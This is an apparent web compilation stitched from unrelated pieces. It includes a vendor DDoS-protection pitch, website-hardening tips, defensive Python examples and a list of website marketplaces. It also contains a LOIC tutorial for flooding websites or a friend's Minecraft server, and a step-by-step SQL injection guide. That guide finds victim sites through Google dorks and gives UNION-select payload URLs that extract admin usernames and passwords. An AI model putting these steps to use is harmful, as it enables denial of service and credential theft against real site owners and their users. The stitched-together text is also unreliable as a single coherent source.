HOW TO PROTECT AGAINST DDOS ATTACKS - STOP DENIAL OF SERVICE

DDoS Attacks: Situation Overview

Over the last decade, Distributed Denial of Service (DDoS) attacks have continued to proliferate, becoming one of the primary threat types facing virtually every industry and business area that is exposed to the public Internet. Therefore, DDoS protection must be at the core of a successful security strategy.
DDoS attacks attempt to bring down and infiltrate Web sites by flooding the site's origin server with bogus requests, often from multiple locations and networks. If allowed to proceed unchecked, this DDoS attack traffic can produce results ranging from slow page loads to a complete blockage of legitimate site traffic.
These types of attacks can originate from a variety of sources, including 'hacktivists,' for-profit hackers, state-sponsored hacking groups, and others. In many cases, DDoS attacks leverage the force multiplication advantage of 'botnets,' essentially armies of computers that are penetrated and recruited to generate attack traffic unbeknownst to their own user or administrator.

DDoS Mitigation

Given the growing number and scale of DDoS attacks, planning for DDoS attack detection and mitigation is a critical IT function. Since it's virtually impossible to build out sufficient infrastructure to scale in response to a large DDoS attack, solutions like Akamai's Kona Site Defender are increasingly being deployed by owners of Web properties across virtually every industry. Cloud-based solutions like Kona Site Defender offer built-in scalability and global reach to defend against most common types of DDoS attacks, as well as attacks against web applications (SQL injection, cross-site scripting, etc.) and direct-to-origin attacks.

How Kona Site Defender Blocks DDoS Attacks

Kona Site Defender mitigates DDoS attacks by absorbing DDoS traffic targeted at the application layer, deflecting all DDoS traffic targeted at the network layer such as SYN Floods or UDP Floods, and authenticating valid traffic at the network edge. This built-in protection is "always on", and only Port 80 (HTTP) or Port 443 (HTTPS) traffic is allowed. Bursting fees can be capped so users are protected from DDoS traffic running up service fees, and flexible caching maximizes offload from origin.
For added protection, many organizations add a defense layer that protects the Domain Name Server from being overloaded and compromised by Denial of Service attacks, such as Akamai's Fast DNS solution. Both of these solutions leverage the power of the Akamai Intelligent Platform™, which consists of more than 160,000 servers deployed across over 1,200 networks in more than 95 countries.

Akamai's Global Scale Helps Combat DDoS Attack Traffic

The worldwide distribution and massive scale of the Akamai Intelligent Platform™ enables Web sites to stay available without re-routing traffic or impacting performance. Akamai handles 5.5Tbps of traffic daily on average and has handled peak traffic flows of over 8Tbps. And DDoS mitigation capabilities are implemented natively in path so protection is provided only one network hop from the point of request—NOT at the customer origin.

How to DDos a Website Like a Pro (Windows Only)

Welcome to this short and easy tutorial on hacking and DDoSing (is that even a word? I don't know). Anyway, let's get started.
First of all, DDoS means distributed denial of service attack, and yes, I don't know what the HELL it means either. But anyway, DDoSing is where you spam a website or server with so much data that it forces them to close down for a short amount of time. Be warned though, if you have a bandwidth cap then this will waste it within a minute, so only do this if you're using an ISP with unlimited bandwidth. P.S. you will need quite a lot of computers to shut websites down, but you can at least lag them a lot. It's good for winding your friend up if he has a Minecraft server or something though.

Step 1: Getting the Software

To DDoS, first you're going to have to get the software. The software we are going to be using in this tutorial is called Low Orbit Ion Cannon (abbreviated LOIC); you can get this from http://sourceforge.net/projects/loic/ Once you download the file, go ahead and extract it to your desktop.

Step 2: Targeting the Website

Now open LOIC (obvious, but I want to get some of them little credit thingys so I'm trying to make it however many words long) and you will be prompted with a screen a little bit like this:
First of all, find the box that says 1. Select your target and fill it in. If you want to DDoS a website, put the web address in the URL box; if you have an IP you want to DDoS then put the IP in the box. Then press the Lock on button next to the text box you filled in.

Step 3: Configuring the Attack

Skip the big button that says IMMA CHARGIN MAH LAZER and go to section 3 that says Attack options. Keep timeout, HTTP subsite and the speed bar the same, but in TCP/UDP message enter a random message, in port type whatever port you want to attack, and in method select UDP. (If you're attacking a website keep the port the same, and for Minecraft servers it is usually 25565.) Also, uncheck wait for reply and keep threads at 10. If you have a good PC you can change it to 20, but no more than 20. In the end, your screen should look like this:

Step 4: Fire the Lazer!!!!!!!!!!!!!!!!!!!

Now all that's left to do is press the big button that says IMMA CHARGIN MAH LAZER. Once you have pressed that, you should see the Requested column in Attack status filling up with loads of numbers and stuff. This is how many times it has requested that page or Minecraft server or whatever from the server.
Hope you enjoyed this tutorial, and be sure to give that kudos stuff, even if it does get rid of them little credit thingys.

How to Secure a Website

* CSRF - You need to have protection in place to prevent cross-site request forgery - or requests to login, signup, or other actions from other sites. This can be used to trick users into performing actions they didn't intend to.
* CAPTCHA on signup - It's often recommended to use a CAPTCHA on your sign-up form to reduce automated signups. How important this is depends on your threat model.
* Secure login - The login needs to happen over HTTPS to reduce the risk of the user's credentials being captured via a MiTM attack.
* Cookies - While login over HTTPS should be seen as a minimum, everything else really should be over SSL as well to protect the cookies (remember Firesheep?). Though just using SSL isn't enough, you need to set the Secure flag and HttpOnly flag whenever possible.
* Email Confirmation - You need to make sure that you verify a user's email address as part of the sign-up process (I'd suggest not letting them login until it's confirmed). You'll need to have this for use in password resets.
* Bruteforce protection - You need to protect against an attacker bruteforcing user accounts. There are various ways to do this: locking accounts (which can be used as a DoS attack by locking out large numbers of users), limiting failed attempts from a given IP (either via ban, or additional CAPTCHA). There are pros and cons to each method, but it's important that you have some form of protection in place.
* Secure password reset - You need to make sure that you have a secure method for resetting passwords. This one is more complicated than most people think, and is easy to get wrong (as Apple recently found). The biggest risk is that an attacker finds a way to abuse the feature to reset accounts that they don't own.
I'd strongly suggest that you read the OWASP Authentication Cheat Sheet; it goes into detail on these and many other potential issues, and as always, when building new systems, it's a good time to take another look at the OWASP Top 10 and make sure you have taken the proper precautions.
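The trade-off in the bruteforce item above (account lockouts can themselves be turned into a denial of service) is easier to see in code. The following is an added example, not part of the answer above: a hypothetical LoginThrottle that counts recent failures per source IP and per account, escalates to a CAPTCHA first, and only refuses requests outright on the per-IP counter, so that bad passwords sent against one account never lock its real owner out. The thresholds, the window length and the 203.0.113.x / 198.51.100.x addresses are constructed values.

```python
"""Failed-login throttling with sliding windows. Added example, hypothetical design.

Two counters are kept: failures per source IP and failures per account. The
account counter can only ever demand a CAPTCHA, never a lockout, so flooding
one username with wrong passwords cannot deny service to its owner. The IP
counter is the one that eventually refuses requests outright.
"""
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 600        # failures older than this no longer count (constructed)
IP_CAPTCHA_AFTER = 5        # failures from one IP before a CAPTCHA is required
IP_BLOCK_AFTER = 50         # failures from one IP before it is refused
ACCOUNT_CAPTCHA_AFTER = 3   # failures against one account before a CAPTCHA


class LoginThrottle:
    def __init__(self, clock=time.monotonic):
        self.clock = clock                          # injectable for tests
        self.ip_failures = defaultdict(deque)       # ip -> failure timestamps
        self.account_failures = defaultdict(deque)  # username -> failure timestamps

    def _recent(self, table, key):
        """Drop timestamps outside the window and return how many remain."""
        q = table[key]
        cutoff = self.clock() - WINDOW_SECONDS
        while q and q[0] <= cutoff:
            q.popleft()
        return len(q)

    def decide(self, ip, username):
        """Return 'allow', 'captcha' or 'block' for a login attempt about to happen."""
        ip_n = self._recent(self.ip_failures, ip)
        acct_n = self._recent(self.account_failures, username)
        if ip_n >= IP_BLOCK_AFTER:
            return "block"
        if ip_n >= IP_CAPTCHA_AFTER or acct_n >= ACCOUNT_CAPTCHA_AFTER:
            return "captcha"
        return "allow"

    def record_failure(self, ip, username):
        now = self.clock()
        self.ip_failures[ip].append(now)
        self.account_failures[username].append(now)

    def record_success(self, ip, username):
        # A correct password (plus CAPTCHA, if one was demanded) clears the
        # account counter. The IP counter is deliberately left alone: a lucky
        # guess from a noisy source should not reset that source's quota.
        self.account_failures.pop(username, None)


if __name__ == "__main__":
    th = LoginThrottle()
    for _ in range(3):
        th.record_failure("203.0.113.5", "alice")   # constructed address
    print(th.decide("203.0.113.5", "alice"))         # captcha
    print(th.decide("203.0.113.5", "bob"))           # allow
```

Call decide() before checking the password and record_failure() after a wrong one. The IP key must be the real client address as seen by the server (or a forwarded-for header only when it was set by your own trusted proxy), otherwise the per-IP counter is trivially evaded and the account counter alone is all that remains.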

Hacking website using SQL Injection -step by step guide

Before we see what SQL injection is, we should know what SQL and a database are.
Database:
A database is a collection of data. From a website's point of view, the database is used for storing user IDs, passwords, web page details and more.
Some databases are:
* DB servers,
* MySQL (open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* PostgreSQL (open source),
* SQLite.
SQL:
SQL stands for Structured Query Language. In order to communicate with the database, we use SQL queries. We are querying the database, so it is called a query language.
Definition from Complete reference:
SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name “SQL” is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation
“S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.
Simple basic queries for SQL:
select * from table_name :
This statement is used for showing the content of a table, including the column names.
For eg:
select * from users;
insert into table_name(column_names, ...) values(corresponding values for columns):
For inserting data into a table.
For eg:
insert into users(username,userid) values('BreakTheSec','break');
I will give more detail and query in my next thread about the SQL QUERY.
What is SQL Injection?
SQL injection is a common and famous method of hacking at present. Using this method an unauthorized person can access the database of the website. The attacker can get all details from the database.
What can an attacker do?
* Bypassing logins
* Accessing secret data
* Modifying contents of the website
* Shutting down the MySQL server
Now let's dive into the real procedure for the SQL injection.
Follow my steps.
Step 1: Finding a Vulnerable Website:
Our best partner for SQL injection is Google. We can find vulnerable websites (hackable websites) using a Google dork list. A Google dork is a search for vulnerable websites using Google search tricks. There are lots of tricks to search in Google, but we are going to use the "inurl:" command for finding vulnerable websites.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A…t.zip.html
How to use?
Copy one of the above commands and paste it in the Google search box.
Hit enter.
You will get a list of web sites.
We have to visit the websites one by one to check for the vulnerability.
So start from the first website.
Note: if you want to hack a particular website, then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
Step 2: Checking the Vulnerability:
Now we should check the vulnerability of the websites. In order to check the vulnerability, add a single quote (') at the end of the URL and hit enter. (No space between the number and the single quote.)
For eg:
http://www.victimsite.com/index.php?id=2'
If the page remains the same, or shows "page not found", or shows some other web page, then it is not vulnerable.
If it shows any error related to the SQL query, then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Step 3: Finding Number of columns:
Now we have found that the website is vulnerable. The next step is to find the number of columns in the table.
For that, replace the single quote (') with an "order by n" statement. (Leave one space between the number and the "order by n" statement.)
Change n from 1, 2, 3, 4, 5, 6, ..., n until you get an error like "unknown column".
For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
Change the number until you get the error "unknown column".
If you get the error while trying the "x"th number, then the number of columns is "x-1".
I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
So now x=8; the number of columns is x-1, i.e. 7.
Sometimes the above may not work. In that case add "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--
Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement, and change the id value to negative (I mean id=-2; it must be changed, but on some websites it may work without changing).
Replace columns_sequence with the numbers from 1 to x-1 (the number of columns) separated by commas (,).
For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
It will show some numbers on the page (they must be less than the 'x' value, I mean less than or equal to the number of columns).
Like this:

Now select one number.
It shows 3 and 7. Let's take the number 3.
Step 5: Finding version,database,user
Now replace the 3 in the query with "version()".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
It will show the version, for example 5.0.1 or 4.3, something like this.
Replace version() with database() and user() to find the database and user respectively.
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
Step 6: Finding the Table Name
If the version is 5 or above, then follow these steps. Now we have to find the table names of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will show the list of table names. Find the table name which is related to the admin or user.
Now select the "admin" table.
If the version is 4 or something else, you have to guess the table names (user, tbluser). It is hard and boring to do SQL injection with version 4.
Step 7: Finding the Column Name
Now replace "group_concat(table_name)" with "group_concat(column_name)".
Replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".
Now listen carefully: we have to convert the table name to a MySQL CHAR() string and replace mysqlchar with that.
Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()
This will open a small window; enter the table name which you found. I am going to use the admin table name.
Click OK.
Now you can see the CHAR(numbers separated with commas) in the HackBar toolbar.
Copy and paste the code at the end of the URL instead of "mysqlchar".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
columnname should be replaced with one of the listed column names.
anothercolumnname should be replaced with another of the listed column names.
Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
Sometimes it will say the column is not found.
Then try other column names.
Now it will show usernames and passwords.
Enjoy..!! Cheers..!!
If the website has members then jackpot for you. You will have the list of usernames and passwords.
Sometimes you may have the email IDs also; enjoy, you got the goose that lays the golden eggs.
Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.

How to exploit the SQL Injection Attack

Exploiting an SQL injection attack involves solving a puzzle that is a cross between Hangman and 20 Questions. It needs a little understanding of SQL and a great deal of cunning.

Try your Hacking skills against this test system. It takes you through the exploit step-by-step.

The SQL Injection attack allows external users to read details from the database. In a well designed system this will only include data that is available to the public anyway. In a poorly designed system this may allow external users to discover other users' passwords.
Try these steps:

To gain access and find a user name, enter the string as both user name and password in the frame on the right. This should get you logged in as a user (jake happens to be the first user in the table). This tells you that Jake is a user and it allows you to access his account - but it does not tell you his password.

Find out if Jake's password includes the letter "w". Enter xxx as user name and enter the following string as the password:
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='

Find out if Jake's password has "w" as the third letter. Enter xxx as user name and enter the following string as the password:
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='

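Both walkthroughs above (the ?id= lookup probed with "order by" and "union select", and the login form probed with the EXISTS() strings) come down to the same defect: user input is pasted into SQL text. The following added example, which is not part of either tutorial, puts the vulnerable form of each query next to its parameterized form, using a constructed in-memory SQLite database (so no MySQL information_schema) with a two-column articles table and one made-up users row. The probe strings are the ones quoted on this page, with the UNION one reduced to this toy table's column count; the vulnerable functions return the rows the tutorials describe, the hardened ones return nothing for the same input.

```python
"""The ?id= lookup and the login check, vulnerable and parameterized.

Added example, not from either tutorial. The schema, the article row and the
user row are constructed sample data.
"""
import sqlite3

SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO articles VALUES (2, 'Hello', 'First post');
CREATE TABLE users (name TEXT, password TEXT);
INSERT INTO users VALUES ('jake', 'sw0rdfish');   -- constructed sample row
"""

# Probes quoted on this page (the UNION one uses this toy table's 2 columns).
UNION_PROBE = "-2 union select 1,2--"
LOGIN_PROBE_W = ("' OR EXISTS(SELECT * FROM users WHERE name='jake' "
                 "AND password LIKE '%w%') AND ''='")
LOGIN_PROBE_3RD = ("' OR EXISTS(SELECT * FROM users WHERE name='jake' "
                   "AND password LIKE '__w%') AND ''='")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- index.php?id=N as written in the step-by-step guide -------------------

def article_vulnerable(conn, id_param):
    # The query-string value is pasted into the SQL, so "order by",
    # "union select" and "--" all become part of the statement.
    sql = "SELECT title, body FROM articles WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def article_hardened(conn, id_param):
    # Reject anything that is not an integer, then bind it as a parameter:
    # the value travels as data and can never change the statement's shape.
    try:
        article_id = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "SELECT title, body FROM articles WHERE id=?", (article_id,)
    ).fetchall()


# --- login form from the Hangman / 20 Questions walkthrough ----------------

def login_vulnerable(conn, name, password):
    sql = ("SELECT name FROM users WHERE name='" + name
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, name, password):
    # Bound parameters: the quote in the probe is just a character inside a
    # string value, so the EXISTS() oracle never reaches the SQL parser.
    row = conn.execute(
        "SELECT name FROM users WHERE name=? AND password=?", (name, password)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable union :", article_vulnerable(db, UNION_PROBE))   # [(1, 2)]
    print("hardened union   :", article_hardened(db, UNION_PROBE))     # []
    print("vulnerable %w%   :", login_vulnerable(db, "xxx", LOGIN_PROBE_W))    # jake
    print("vulnerable __w%  :", login_vulnerable(db, "xxx", LOGIN_PROBE_3RD))  # None
    print("hardened %w%     :", login_hardened(db, "xxx", LOGIN_PROBE_W))      # None
```

The hardened login still compares a plaintext password so that the example stays on one point; in a real system the users table holds a salted hash and the comparison happens in code, which is what turns the "poorly designed system" of the walkthrough, where an injection can read passwords, into one where the column is useless even if it leaks.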
12 Tips to Protect Your Company Website From Hackers

Making your website live is like unlocking the door to your premises with your office and safe open: Most of the people who visit your physical building will never even know that all of your data is there to discover just by walking in. Occasionally you will find someone with malicious intent who will walk in and steal your data. That is why you have locks on doors and safes.
Your website is just the same, except that you will never see anyone come in unless you have protection systems in place. Electronic thieves are invisible and fast, searching your website for details of customers' accounts, especially for their credit card information. You have a legal obligation to protect this data from theft and to report security breaches that occur.
Theft is not the only thing on the mind of a hacker: Sheer destruction is a major motivator. Hackers may want to destroy all your records, put a sick message on your customers' screens or just destroy your reputation.
You can never undo the damage done by a hacker, but you can take steps to prevent it. Even the most basic protection will discourage many hackers enough to make them go looking for easier pickings elsewhere. Thieves are likelier to steal from people who leave their doors unlocked.

1. Stay updated.

You need to stay up to date with hacking threats. If you have at least a basic knowledge of what is possible then you can protect your website against it. Follow updates at a tech site such as The Hacker News. Use the information you gain to put fresh precautions in place when necessary.

2. Toughen up access control.

The admin level of your website is an easy way into everything you do not want a hacker to see. Enforce user names and passwords that cannot be guessed. Change the default database prefix from "wp6_" to something random and harder to guess. Limit the number of login attempts within a certain time, even with password resets, because email accounts can be hacked as well. Never send login details by email, in case an unauthorized user has gained access to the account.

3. Update everything.

Updates cost software companies money. They only do it when necessary, yet many people who use the software do not install updates immediately. If the reason behind the update is a security vulnerability, delaying an update exposes you to attack in the interim period. Hackers can scan thousands of websites an hour looking for vulnerabilities that will allow them to break in. They network like crazy, so if one hacker knows how to get into a program then hundreds of hackers will know as well.

4. Tighten network security.

Computer users in your office may be inadvertently providing an easy access route to your website servers. Ensure that:
  • Logins expire after a short period of inactivity.
  • Passwords are changed frequently.
  • Passwords are strong and NEVER written down.
  • All devices plugged into the network are scanned for malware each time they are attached.
Ever since I founded my hosting company, we've had to watch our network security on a minute-by-minute basis not to be hacked. 

5. Install a web application firewall.

A web application firewall (WAF) can be software or hardware based. It sits between your website server and the data connection and reads every bit of data passing through it.
Most modern WAFs are cloud based and provided as a plug-and-play service, for a modest monthly subscription fee. Basically, the cloud service is deployed in front of your server, where it serves as a gateway for all incoming traffic. Once installed, a web application firewall provides complete peace of mind, by blocking all hacking attempts and also filtering out other types of unwanted traffic, like spammers and malicious bots. This is a great way to avoid getting hacked like Craigslist.

6. Install security applications.

While not as effective as a full blown WAF, there are some free and paid-for security applications that you can install that will make life a bit more difficult for hackers. In fact, even some free plugins such as that from Acunetix WP Security can provide an additional level of protection by hiding the identity of your website's CMS. By doing so this tool makes you more resilient against automated hacking tools that scout the web, looking for WordPress sites with a specific build and version that has one or more known vulnerabilities.

7. Hide admin pages.

You do not want your admin pages to be indexed by search engines, so you should use the robots.txt file to discourage search engines from listing them. If they are not indexed then they are harder for hackers to find. This tutorial from SEObook.com is all the help you will need.

8. Limit file uploads.

File uploads are a major concern. No matter how thoroughly the system checks them out, bugs can still get through and allow a hacker unlimited access to your site’s data. The best solution is to prevent direct access to any uploaded files. Store them outside the root directory and use a script to access them when necessary. Your web host will probably help you to set this up.
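What "store them outside the root directory and use a script to access them" looks like in practice, as an added example that is not from the article: a hypothetical download handler that maps a requested file name onto an upload directory the web server never serves directly, refuses any name that could escape that directory (path separators, "..", planted symlinks), only hands back files with an extension the application expects, and sends headers that force a download rather than in-browser rendering. The directory layout and the sample files are constructed by make_demo_root().

```python
"""Serving uploaded files from outside the web root through a script.

Added example, hypothetical design. Assumed layout: the web server's document
root is elsewhere (say /var/www/html), and uploads live in a separate
directory that is never mapped to a URL; read_upload() is the only path to
them. make_demo_root() builds a constructed directory with sample files.
"""
import mimetypes
import tempfile
from pathlib import Path
from typing import Dict, Optional, Tuple

# Only the types the application itself stores; a script file that slipped
# past the upload check is never served, whatever its contents.
ALLOWED_SUFFIXES = {".pdf", ".png", ".jpg", ".jpeg"}


def resolve_upload(upload_root: Path, requested: str) -> Optional[Path]:
    """Map a user-supplied file name onto the upload directory, or return None."""
    if (not requested or requested in (".", "..")
            or "/" in requested or "\\" in requested):
        return None                                 # no paths, only names
    root = upload_root.resolve()
    candidate = (root / requested).resolve()        # resolve() follows symlinks
    if candidate.parent != root:                    # symlink pointing outside
        return None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    if not candidate.is_file():
        return None
    return candidate


def read_upload(upload_root: Path, requested: str) -> Tuple[int, Dict[str, str], bytes]:
    """Return (status, headers, body) the way a download handler would."""
    path = resolve_upload(upload_root, requested)
    if path is None:
        return 404, {}, b""                         # same answer for every refusal
    content_type = mimetypes.guess_type(path.name)[0] or "application/octet-stream"
    headers = {
        "Content-Type": content_type,
        # Force a download and stop browsers from sniffing a different type.
        "Content-Disposition": 'attachment; filename="%s"' % path.name,
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, path.read_bytes()


def make_demo_root() -> Path:
    """Create a constructed upload directory with sample files for the demo."""
    root = Path(tempfile.mkdtemp(prefix="uploads-"))
    (root / "report.pdf").write_bytes(b"%PDF-1.4 constructed sample\n")
    (root / "evil.php").write_bytes(b"<?php /* must never be served */ ?>\n")
    try:
        # A symlink planted inside the upload dir that points outside it.
        (root / "link.pdf").symlink_to(Path(tempfile.gettempdir()) / "outside.pdf")
    except OSError:
        pass                                        # platform without symlinks
    return root


if __name__ == "__main__":
    demo_root = make_demo_root()
    for name in ("report.pdf", "evil.php", "../report.pdf", "link.pdf", "missing.pdf"):
        status, _, _ = read_upload(demo_root, name)
        print("%-16s -> %d" % (name, status))
```

The handler deliberately answers 404 for every refusal, so a caller cannot tell "outside the directory" from "does not exist". Store uploads under a server-generated name (a random token plus the validated extension) rather than the name the uploader supplied, and the lookup above becomes a simple token-to-file mapping.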

9. Use SSL.

Use an encrypted SSL protocol to transfer users' personal information between the website and your database. This will prevent the information being read in transit or accessed without the proper authority.

10. Remove form auto-fill.

When you leave auto-fill enabled for forms on your website, you leave it vulnerable to attack from any user’s computer or phone that has been stolen. You should never expose your website to attacks that utilize the laziness of a legitimate user.

11. Back-up frequently.

Just in case the worst happens anyway, keep everything backed-up. Back up on-site, back up off-site, back up everything multiple times a day. Every time a user saves a file it should automatically back up in multiple locations. Backing up once a day means that you lose that day’s data when your hard drive fails. Remember every hard drive will fail.

12. You can't hide your code.

You can buy software that says it will hide the code on your webpages. It doesn’t work. Browsers need access to your code in order to render your website pages, so there are simple ways to get around web-page “encryption.”
Disabling “right-click” as a way to view your website code is annoying to users because it also disables every other “right-click” function, and there are simple workarounds that every hacker knows anyway. If you have been told that it is possible then read this article on HTMLgoodies.com to get in-depth explanations of why you can never hide your code.

10 Places to Sell Your Web Site

There comes a time when we all have an idea for a web site, we set it up and then…we never have time to work on it. There also comes a time when you realize you don’t have the passion you once did, and instead of just letting it die, you want to find a new caretaker for your once beloved web site. So, what do you do when one of these situations happens?
Well, it’s time for you to look into selling it off — but then comes the question of where to do that. We’ve collected ten of the best options for you.
Flippa.com: has the most websites for sale, over 3,000 at time of writing, and also has the largest number of buyers: over 600,000 are registered to buy websites and domain names on Flippa. Over $130 million in web sites have sold on Flippa since launch in 2009. Flippa comes with a simple interface, a super powerful search feature and the option to upgrade your auction; they charge a small listing fee ($9-$19), with a 10% success fee. What makes Flippa stand out from the pack is their trust and verification features, like phone number verification and verified Google Analytics traffic stats, which helps boost average selling prices. Flippa also attracts serious buyers who are prepared to pay good money for high quality sites through Deal Flow, its website broker service.
BuySellWebsite.com: BuySellWebsite specializes in established and start-up web sites. Established web sites cost $59 for a 2-week listing, or $99 for a two-month long listing (with a free one-month extension, for a total of three months) that includes being featured on the front page. Start-up sites cost the same, but don’t include the front page featuring.
Forums.DigitalPoint.com: A forum for all types of web development that allows you to post a site for sale as long as you have been a member for at least 14 days, do not have a reputation in the red and have a minimum of 25 posts throughout their boards.
GeekVillage.com Forums: To list your site with the GeekVillage.com forums, it will cost you $9.95 per topic, and you must be a member in good standing with the forum.
InternetCompanyForSale.com: This site charges no commissions on the sales through their company, but they do have one-time listing fees depending on the type of site you want to sell. Established sites pay $59.95 for list-til-you-sell. Start-up sites will cost you $39.95, and a Permanently Featured Listing, either for an established site or start-up, will cost you $99 and will get you featured in their bi-weekly newsletter.
SiteIndeed.com: SiteIndeed provides basic listing ads for free for up to 90 days, but if you want to extend your listing past that they will charge you a fee based upon the number of days you choose. The site also provides featured listings that will give your site more prominent display for a fee, based on the number of days you wish to list it.
Talk.iWebTool.com: A forum dedicated to everything about developing your own web sites and domain names. It also has an active sales area for selling domain names, sites, scripts and more.
Webmaster-Talk.com Marketplace: A general sales site that allows you to do everything from promoting your services to selling your established sites. General listing fees are free, but services such as promotions will cost you credits you purchase with the site. With auctions, you can select to feature it on the main page, highlight it, etc., and those services will cost you a few dollars each.
WebsiteAcquire.com: WebsiteAcquire only charges $5 for listing your site, but it isn’t very browsing friendly. When a user clicks on the link to buy a site, they ask you to search on keywords instead of just letting you browse the currently available listings.
WebsiteBroker.com: WebsiteBroker allows you to sell both domain names and complete web sites. Web sites can be listed for 90 days for $9.95, or $29.95 for a premium listing that gains you extra exposure. Domain names have similar auctions priced at $9.95 for a standard listing and $14.95 for premium. There are no commissions charged on completed listings.
Which site is your favorite for selling your excess web sites?